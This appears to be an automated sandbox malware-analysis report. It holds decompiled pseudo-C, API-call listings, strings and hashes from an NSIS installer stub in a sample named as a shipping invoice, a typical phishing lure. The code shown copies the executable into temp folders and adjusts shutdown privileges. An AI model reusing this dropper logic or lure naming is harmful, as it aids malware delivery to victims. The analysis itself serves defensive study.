                                                                                                                                    											if( *0x42f440 == 0) {
                                                                                                                                    												L42:
                                                                                                                                    												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
                                                                                                                                    												 *(_t163 + 0x18) = E00403983( *0x42f4ec);
                                                                                                                                    												goto L43;
                                                                                                                                    											}
                                                                                                                                    											_t152 = E00405B29(_t159, 0);
                                                                                                                                    											if(_t152 < _t159) {
                                                                                                                                    												L39:
                                                                                                                                    												_t181 = _t152 - _t159;
                                                                                                                                    												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
                                                                                                                                    												if(_t152 < _t159) {
                                                                                                                                    													_t150 = E004057ED(_t184);
                                                                                                                                    													lstrcatA(_t156, "~nsu");
                                                                                                                                    													if(_t150 != 0) {
                                                                                                                                    														lstrcatA(_t156, "A");
                                                                                                                                    													}
                                                                                                                                    													lstrcatA(_t156, ".tmp");
                                                                                                                                    													_t161 = "C:\\Users\\jones\\Desktop";
                                                                                                                                    													if(lstrcmpiA(_t156, "C:\\Users\\jones\\Desktop") != 0) {
                                                                                                                                    														_push(_t156);
                                                                                                                                    														if(_t150 == 0) {
                                                                                                                                    															E004057D0();
                                                                                                                                    														} else {
                                                                                                                                    															E00405753();
                                                                                                                                    														}
                                                                                                                                    														SetCurrentDirectoryA(_t156);
                                                                                                                                    														_t188 =  *0x435400; // 0x0
                                                                                                                                    														if(_t188 == 0) {
                                                                                                                                    															E00406166(0x435400, _t161);
                                                                                                                                    														}
                                                                                                                                    														E00406166(0x430000,  *(_t163 + 0x1c));
                                                                                                                                    														_t136 = "A";
                                                                                                                                    														_t162 = 0x1a;
                                                                                                                                    														 *0x430400 = "A";
                                                                                                                                    														do {
                                                                                                                                    															E00406188(0, 0x429458, _t156, 0x429458,  *((intOrPtr*)( *0x42f434 + 0x120)));
                                                                                                                                    															DeleteFileA(0x429458);
                                                                                                                                    															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe", 0x429458, 1) != 0) {
                                                                                                                                    																E00405F45(_t136, 0x429458, 0);
                                                                                                                                    																E00406188(0, 0x429458, _t156, 0x429458,  *((intOrPtr*)( *0x42f434 + 0x124)));
                                                                                                                                    																_t93 = E00405805(0x429458);
                                                                                                                                    																if(_t93 != 0) {
                                                                                                                                    																	CloseHandle(_t93);
                                                                                                                                    																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    															 *0x430400 =  *0x430400 + 1;
                                                                                                                                    															_t162 = _t162 - 1;
                                                                                                                                    														} while (_t162 != 0);
                                                                                                                                    														E00405F45(_t136, _t156, 0);
                                                                                                                                    													}
                                                                                                                                    													goto L43;
                                                                                                                                    												}
                                                                                                                                    												 *_t152 = 0;
                                                                                                                                    												_t153 = _t152 + 4;
                                                                                                                                    												if(E00405BEC(_t181, _t152 + 4) == 0) {
                                                                                                                                    													goto L43;
                                                                                                                                    												}
                                                                                                                                    												E00406166(0x435400, _t153);
                                                                                                                                    												E00406166("C:\\Users\\jones\\AppData\\Local\\Temp", _t153);
                                                                                                                                    												 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                                                                                                    												goto L42;
                                                                                                                                    											}
                                                                                                                                    											_t109 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
                                                                                                                                    											while( *_t152 != _t109) {
                                                                                                                                    												_t152 = _t152 - 1;
                                                                                                                                    												if(_t152 >= _t159) {
                                                                                                                                    													continue;
                                                                                                                                    												}
                                                                                                                                    												goto L39;
                                                                                                                                    											}
                                                                                                                                    											goto L39;
                                                                                                                                    										}
                                                                                                                                    										GetWindowsDirectoryA(_t156, 0x3fb);
                                                                                                                                    										lstrcatA(_t156, "\\Temp");
                                                                                                                                    										_t112 = E00403378(_t172);
                                                                                                                                    										_t173 = _t112;
                                                                                                                                    										if(_t112 != 0) {
                                                                                                                                    											goto L33;
                                                                                                                                    										}
                                                                                                                                    										GetTempPathA(0x3fc, _t156);
                                                                                                                                    										lstrcatA(_t156, "Low");
                                                                                                                                    										SetEnvironmentVariableA("TEMP", _t156);
                                                                                                                                    										SetEnvironmentVariableA("TMP", _t156);
                                                                                                                                    										_t117 = E00403378(_t173);
                                                                                                                                    										_t174 = _t117;
                                                                                                                                    										if(_t117 == 0) {
                                                                                                                                    											goto L43;
                                                                                                                                    										}
                                                                                                                                    										goto L33;
                                                                                                                                    									}
                                                                                                                                    									goto L25;
                                                                                                                                    								}
                                                                                                                                    								_t140 = _t55[4];
                                                                                                                                    								__eflags = _t140 - 0x20;
                                                                                                                                    								if(_t140 == 0x20) {
                                                                                                                                    									L23:
                                                                                                                                    									_t15 = _t163 + 0x20;
                                                                                                                                    									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
                                                                                                                                    									__eflags =  *_t15;
                                                                                                                                    									goto L24;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t140;
                                                                                                                                    								if(_t140 != 0) {
                                                                                                                                    									goto L24;
                                                                                                                                    								}
                                                                                                                                    								goto L23;
                                                                                                                                    							}
                                                                                                                                    							_t141 = _t55[1];
                                                                                                                                    							__eflags = _t141 - 0x20;
                                                                                                                                    							if(_t141 == 0x20) {
                                                                                                                                    								L19:
                                                                                                                                    								 *0x42f4e0 = 1;
                                                                                                                                    								goto L20;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t141;
                                                                                                                                    							if(_t141 != 0) {
                                                                                                                                    								goto L20;
                                                                                                                                    							}
                                                                                                                                    							goto L19;
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						goto L12;
                                                                                                                                    					}
                                                                                                                                    					do {
                                                                                                                                    						L12:
                                                                                                                                    						_t55 =  &(_t55[1]);
                                                                                                                                    						__eflags =  *_t55 - 0x20;
                                                                                                                                    					} while ( *_t55 == 0x20);
                                                                                                                                    					goto L13;
                                                                                                                                    				}
                                                                                                                                    				goto L30;
                                                                                                                                    			}

































                                                                                                                                    0x00000000
                                                                                                                                    0x004036bf
                                                                                                                                    0x00403644
                                                                                                                                    0x00403648
                                                                                                                                    0x0040367e
                                                                                                                                    0x0040367e
                                                                                                                                    0x00403680
                                                                                                                                    0x00403688
                                                                                                                                    0x004036fa
                                                                                                                                    0x004036fc
                                                                                                                                    0x00403703
                                                                                                                                    0x0040370b
                                                                                                                                    0x0040370b
                                                                                                                                    0x00403716
                                                                                                                                    0x0040371b
                                                                                                                                    0x0040372a
                                                                                                                                    0x0040372e
                                                                                                                                    0x0040372f
                                                                                                                                    0x00403738
                                                                                                                                    0x00403731
                                                                                                                                    0x00403731
                                                                                                                                    0x00403731
                                                                                                                                    0x0040373e
                                                                                                                                    0x00403744
                                                                                                                                    0x0040374a
                                                                                                                                    0x00403752
                                                                                                                                    0x00403752
                                                                                                                                    0x00403760
                                                                                                                                    0x00403765
                                                                                                                                    0x00403777
                                                                                                                                    0x0040377f
                                                                                                                                    0x00403785
                                                                                                                                    0x00403791
                                                                                                                                    0x00403797
                                                                                                                                    0x004037a1
                                                                                                                                    0x004037b7
                                                                                                                                    0x004037c8
                                                                                                                                    0x004037ce
                                                                                                                                    0x004037d5
                                                                                                                                    0x004037d8
                                                                                                                                    0x004037de
                                                                                                                                    0x004037de
                                                                                                                                    0x004037d5
                                                                                                                                    0x004037e2
                                                                                                                                    0x004037e8
                                                                                                                                    0x004037e8
                                                                                                                                    0x004037ed
                                                                                                                                    0x004037ed
                                                                                                                                    0x00000000
                                                                                                                                    0x0040372a
                                                                                                                                    0x0040368a
                                                                                                                                    0x0040368c
                                                                                                                                    0x00403697
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040369f
                                                                                                                                    0x004036aa
                                                                                                                                    0x004036af
                                                                                                                                    0x00000000
                                                                                                                                    0x004036af
                                                                                                                                    0x00403673
                                                                                                                                    0x00403675
                                                                                                                                    0x00403679
                                                                                                                                    0x0040367c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040367c
                                                                                                                                    0x00000000
                                                                                                                                    0x00403675
                                                                                                                                    0x004035c5
                                                                                                                                    0x004035d1
                                                                                                                                    0x004035d6
                                                                                                                                    0x004035db
                                                                                                                                    0x004035dd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004035e5
                                                                                                                                    0x004035ed
                                                                                                                                    0x004035fe
                                                                                                                                    0x00403606
                                                                                                                                    0x00403608
                                                                                                                                    0x0040360d
                                                                                                                                    0x0040360f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040360f
                                                                                                                                    0x00000000
                                                                                                                                    0x00403574
                                                                                                                                    0x00403535
                                                                                                                                    0x00403538
                                                                                                                                    0x0040353b
                                                                                                                                    0x00403541
                                                                                                                                    0x00403541
                                                                                                                                    0x00403541
                                                                                                                                    0x00403541
                                                                                                                                    0x00000000
                                                                                                                                    0x00403541
                                                                                                                                    0x0040353d
                                                                                                                                    0x0040353f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040353f
                                                                                                                                    0x004034f0
                                                                                                                                    0x004034f3
                                                                                                                                    0x004034f6
                                                                                                                                    0x004034fc
                                                                                                                                    0x004034fc
                                                                                                                                    0x00000000
                                                                                                                                    0x004034fc
                                                                                                                                    0x004034f8
                                                                                                                                    0x004034fa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004034fa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004034cb
                                                                                                                                    0x004034cb
                                                                                                                                    0x004034cb
                                                                                                                                    0x004034cc
                                                                                                                                    0x004034cc
                                                                                                                                    0x00000000
                                                                                                                                    0x004034cb
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE ref: 004033CE
                                                                                                                                    • GetVersion.KERNEL32 ref: 004033D4
                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403407
                                                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403443
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040344A
                                                                                                                                    • SHGetFileInfoA.SHELL32(00429858,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403466
                                                                                                                                    • GetCommandLineA.KERNEL32(Unbound Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040347B
                                                                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,00000020,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,00000000,?,00000006,00000008,0000000A), ref: 004034B7
                                                                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004035B4
                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C5
                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D1
                                                                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E5
                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035ED
                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035FE
                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403606
                                                                                                                                    • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361A
                                                                                                                                      • Part of subcall function 004064FE: GetModuleHandleA.KERNEL32(?,?,?,0040341C,0000000A), ref: 00406510
                                                                                                                                      • Part of subcall function 004064FE: GetProcAddress.KERNEL32(00000000,?), ref: 0040652B
                                                                                                                                      • Part of subcall function 00403983: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,?,?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000000,00435400,1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000,00000002,73BCFA90), ref: 00403A73
                                                                                                                                      • Part of subcall function 00403983: lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,?,?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000000,00435400,1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000), ref: 00403A86
                                                                                                                                      • Part of subcall function 00403983: GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent), ref: 00403A91
                                                                                                                                      • Part of subcall function 00403983: LoadImageA.USER32 ref: 00403ADA
                                                                                                                                      • Part of subcall function 00403983: RegisterClassA.USER32 ref: 00403B17
                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000006,00000008,0000000A), ref: 004036C3
                                                                                                                                      • Part of subcall function 00403891: CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,004036C8,?,?,00000006,00000008,0000000A), ref: 004038A3
                                                                                                                                      • Part of subcall function 00403891: CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,004036C8,?,?,00000006,00000008,0000000A), ref: 004038B7
                                                                                                                                    • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004036C8
                                                                                                                                    • ExitProcess.KERNEL32 ref: 004036E9
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403806
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403825
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403844
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403868
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040388B
                                                                                                                                      • Part of subcall function 00405882: MessageBoxIndirectA.USER32 ref: 004058DD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Exit$FileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                    • String ID: "$"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Unbound Setup$\Temp$~nsu
                                                                                                                                    • API String ID: 3766654759-3154804242
                                                                                                                                    • Opcode ID: 2d1791a0c037a7f8e242bac324cf0b3027c210a3f85da8737e33250c6c7e0a3e
                                                                                                                                    • Instruction ID: b27f96f429de507a0928ae33df45924dffe4dfeafea75076cf50583fbdc57f5c
                                                                                                                                    • Opcode Fuzzy Hash: 2d1791a0c037a7f8e242bac324cf0b3027c210a3f85da8737e33250c6c7e0a3e
                                                                                                                                    • Instruction Fuzzy Hash: B4C117701047407AD7216F759E89B2B3EACAB4570AF44443FF581BA1E2CB7C8A15876E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406469(CHAR* _a4) {
                                                                                                                                    				void* _t2;
                                                                                                                                    
                                                                                                                                    				_t2 = FindFirstFileA(_a4, 0x42c0e8); // executed
                                                                                                                                    				if(_t2 == 0xffffffff) {
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				FindClose(_t2);
                                                                                                                                    				return 0x42c0e8;
                                                                                                                                    			}

                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileA.KERNELBASE(73BCFA90,0042C0E8,0042BCA0,00405C2F,0042BCA0,0042BCA0,00000000,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560), ref: 00406474
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406480
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 21a83238b307d573e2463cc0b26edaa82db6edf9121fcc6ecb87138002c85e66
                                                                                                                                    • Instruction ID: 8e2f8834f5bb85d2431411804d54fad1933aab715e694091bf3f8c9270f6830b
                                                                                                                                    • Opcode Fuzzy Hash: 21a83238b307d573e2463cc0b26edaa82db6edf9121fcc6ecb87138002c85e66
                                                                                                                                    • Instruction Fuzzy Hash: 41D012316451209FC35017786E4C84F7A589F25331721CB37F8AAF21E0C7758C6686AC
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00403983(void* __eflags) {
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				int _v12;
                                                                                                                                    				void _v16;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t25;
                                                                                                                                    				void* _t27;
                                                                                                                                    				int _t28;
                                                                                                                                    				void* _t31;
                                                                                                                                    				int _t34;
                                                                                                                                    				int _t35;
                                                                                                                                    				intOrPtr _t36;
                                                                                                                                    				int _t39;
                                                                                                                                    				char _t57;
                                                                                                                                    				CHAR* _t59;
                                                                                                                                    				signed char _t63;
                                                                                                                                    				CHAR* _t74;
                                                                                                                                    				intOrPtr _t76;
                                                                                                                                    				CHAR* _t81;
                                                                                                                                    
                                                                                                                                    				_t76 =  *0x42f434;
                                                                                                                                    				_t17 = E004064FE(2);
                                                                                                                                    				_t84 = _t17;
                                                                                                                                    				if(_t17 == 0) {
                                                                                                                                    					_t74 = 0x42a898;
                                                                                                                                    					"1033" = 0x30;
                                                                                                                                    					 *0x436001 = 0x78;
                                                                                                                                    					 *0x436002 = 0;
                                                                                                                                    					E0040604D(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a898, 0);
                                                                                                                                    					__eflags =  *0x42a898;
                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                    						E0040604D(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M00408362, 0x42a898, 0);
                                                                                                                                    					}
                                                                                                                                    					lstrcatA("1033", _t74);
                                                                                                                                    				} else {
                                                                                                                                    					E004060C4("1033",  *_t17() & 0x0000ffff);
                                                                                                                                    				}
                                                                                                                                    				E00403C48(_t71, _t84);
                                                                                                                                    				 *0x42f4c0 =  *0x42f43c & 0x00000020;
                                                                                                                                    				 *0x42f4dc = 0x10000;
                                                                                                                                    				if(E00405BEC(_t84, 0x435400) != 0) {
                                                                                                                                    					L16:
                                                                                                                                    					if(E00405BEC(_t92, 0x435400) == 0) {
                                                                                                                                    						E00406188(0, _t74, _t76, 0x435400,  *((intOrPtr*)(_t76 + 0x118)));
                                                                                                                                    					}
                                                                                                                                    					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                                    					 *0x42ec08 = _t25;
                                                                                                                                    					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                                                                    						L21:
                                                                                                                                    						if(E0040140B(0) == 0) {
                                                                                                                                    							_t27 = E00403C48(_t71, __eflags);
                                                                                                                                    							__eflags =  *0x42f4e0;
                                                                                                                                    							if( *0x42f4e0 != 0) {
                                                                                                                                    								_t28 = E0040535F(_t27, 0);
                                                                                                                                    								__eflags = _t28;
                                                                                                                                    								if(_t28 == 0) {
                                                                                                                                    									E0040140B(1);
                                                                                                                                    									goto L33;
                                                                                                                                    								}
                                                                                                                                    								__eflags =  *0x42ebec; // 0x1
                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                    									E0040140B(2);
                                                                                                                                    								}
                                                                                                                                    								goto L22;
                                                                                                                                    							}
                                                                                                                                    							ShowWindow( *0x42a878, 5);
                                                                                                                                    							_t34 = E00406490("RichEd20");
                                                                                                                                    							__eflags = _t34;
                                                                                                                                    							if(_t34 == 0) {
                                                                                                                                    								E00406490("RichEd32");
                                                                                                                                    							}
                                                                                                                                    							_t81 = "RichEdit20A";
                                                                                                                                    							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
                                                                                                                                    							__eflags = _t35;
                                                                                                                                    							if(_t35 == 0) {
                                                                                                                                    								GetClassInfoA(0, "RichEdit", 0x42ebc0);
                                                                                                                                    								 *0x42ebe4 = _t81;
                                                                                                                                    								RegisterClassA(0x42ebc0);
                                                                                                                                    							}
                                                                                                                                    							_t36 =  *0x42ec00; // 0x0
                                                                                                                                    							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403D20, 0);
                                                                                                                                    							E004038D3(E0040140B(5), 1);
                                                                                                                                    							return _t39;
                                                                                                                                    						}
                                                                                                                                    						L22:
                                                                                                                                    						_t31 = 2;
                                                                                                                                    						return _t31;
                                                                                                                                    					} else {
                                                                                                                                    						_t71 =  *0x42f420;
                                                                                                                                    						 *0x42ebc4 = E00401000;
                                                                                                                                    						 *0x42ebd0 =  *0x42f420;
                                                                                                                                    						 *0x42ebd4 = _t25;
                                                                                                                                    						 *0x42ebe4 = 0x40a210;
                                                                                                                                    						if(RegisterClassA(0x42ebc0) == 0) {
                                                                                                                                    							L33:
                                                                                                                                    							__eflags = 0;
                                                                                                                                    							return 0;
                                                                                                                                    						}
                                                                                                                                    						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                                                                    						 *0x42a878 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
                                                                                                                                    						goto L21;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t71 =  *(_t76 + 0x48);
                                                                                                                                    					_t86 = _t71;
                                                                                                                                    					if(_t71 == 0) {
                                                                                                                                    						goto L16;
                                                                                                                                    					}
                                                                                                                                    					_t74 = 0x42e3c0;
                                                                                                                                    					E0040604D(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
                                                                                                                                    					_t57 =  *0x42e3c0; // 0x43
                                                                                                                                    					if(_t57 == 0) {
                                                                                                                                    						goto L16;
                                                                                                                                    					}
                                                                                                                                    					if(_t57 == 0x22) {
                                                                                                                                    						_t74 = 0x42e3c1;
                                                                                                                                    						 *((char*)(E00405B29(0x42e3c1, 0x22))) = 0;
                                                                                                                                    					}
                                                                                                                                    					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                                                                    					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                                                                    						L15:
                                                                                                                                    						E00406166(0x435400, E00405AFE(_t74));
                                                                                                                                    						goto L16;
                                                                                                                                    					} else {
                                                                                                                                    						_t63 = GetFileAttributesA(_t74);
                                                                                                                                    						if(_t63 == 0xffffffff) {
                                                                                                                                    							L14:
                                                                                                                                    							E00405B45(_t74);
                                                                                                                                    							goto L15;
                                                                                                                                    						}
                                                                                                                                    						_t92 = _t63 & 0x00000010;
                                                                                                                                    						if((_t63 & 0x00000010) != 0) {
                                                                                                                                    							goto L15;
                                                                                                                                    						}
                                                                                                                                    						goto L14;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}


























                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004064FE: GetModuleHandleA.KERNEL32(?,?,?,0040341C,0000000A), ref: 00406510
                                                                                                                                      • Part of subcall function 004064FE: GetProcAddress.KERNEL32(00000000,?), ref: 0040652B
                                                                                                                                    • lstrcatA.KERNEL32(1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,00000000), ref: 004039FE
                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,?,?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000000,00435400,1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000,00000002,73BCFA90), ref: 00403A73
                                                                                                                                    • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,?,?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000000,00435400,1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000), ref: 00403A86
                                                                                                                                    • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent), ref: 00403A91
                                                                                                                                    • LoadImageA.USER32 ref: 00403ADA
                                                                                                                                      • Part of subcall function 004060C4: wsprintfA.USER32 ref: 004060D1
                                                                                                                                    • RegisterClassA.USER32 ref: 00403B17
                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403B2F
                                                                                                                                    • CreateWindowExA.USER32 ref: 00403B64
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B9A
                                                                                                                                    • GetClassInfoA.USER32 ref: 00403BC6
                                                                                                                                    • GetClassInfoA.USER32 ref: 00403BD3
                                                                                                                                    • RegisterClassA.USER32 ref: 00403BDC
                                                                                                                                    • DialogBoxParamA.USER32 ref: 00403BFB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
